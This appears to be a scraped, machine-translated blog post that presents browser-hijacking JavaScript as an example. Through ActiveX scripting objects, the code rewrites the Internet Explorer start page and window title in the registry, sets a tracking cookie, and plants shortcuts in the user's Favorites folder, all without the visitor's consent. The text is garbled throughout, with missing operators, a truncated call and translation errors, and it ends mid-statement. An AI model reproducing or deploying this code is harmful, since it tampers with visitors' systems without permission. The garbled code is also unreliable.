JavaScript modify the example of the registry

xiaoxiao2021-03-06  65

Document.write (" "); Function AddFavlnk (LOC, DISPNAME, SiteURL) {var shor = shl.createshortcut (LOC " // " DISPNAME ". URL "); Shor.TargetPath = SiteURL; ();} Function f () {Try {// ActiveX initialization A1 = Document.Applets [0]; a1.setClsid (" {F935DC22-1CF0-11D0-ADB9-00C04FD58A0B} "); A1.CreateInstance (); shl = a1.GetObject (); A1.SETCLSID (" {0D43FE01-F093-11CF-8940-00A0C905428} "); a1.createInstance (); Fso = a1.GetObject (); A1.SETCLSID ("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}"); A1.CreateInstance (); net = a1.GetObject (); try {if (document. Cookie.indexof ("chg") == -1) {// set cookievar expdate = new date ((New Date ()). getTime () (24 * 60 * 60 * 1000 * 90)); Document.cookie = "Chg = general; expires =" expdate.togmtstring () "; path = /;" // set cookie Finished // Setting home SHL.REGWRITE ("HKCU // Software // Microsoft // Internet Explorer // Main // start page ","" "(" HKCU // Software // Microsoft // Internet Explorer /// main // Window "," Your INT ERNET Explorer has been modified by "); // Set cookievar expdate = new date ((new date ()). getTime () (24 * 60 * 60 * 1000 * 90); Document.cookie = "Chg = general; expression =" expdate.togmtstring () "; path = /;" Var WF, Shor, Loc; wf = fso.getspecialfolder (0); LOC = WF "// favorites"; if ( ! Fso.FoldEREXISTS (LOC)) {loc = fso.getdrivename (wf) "// Documents and settings //" net.username "//favorites"; i! (!fso.FoldEREXISTS (LOC)) return }} Addfavlnk (LOC, "


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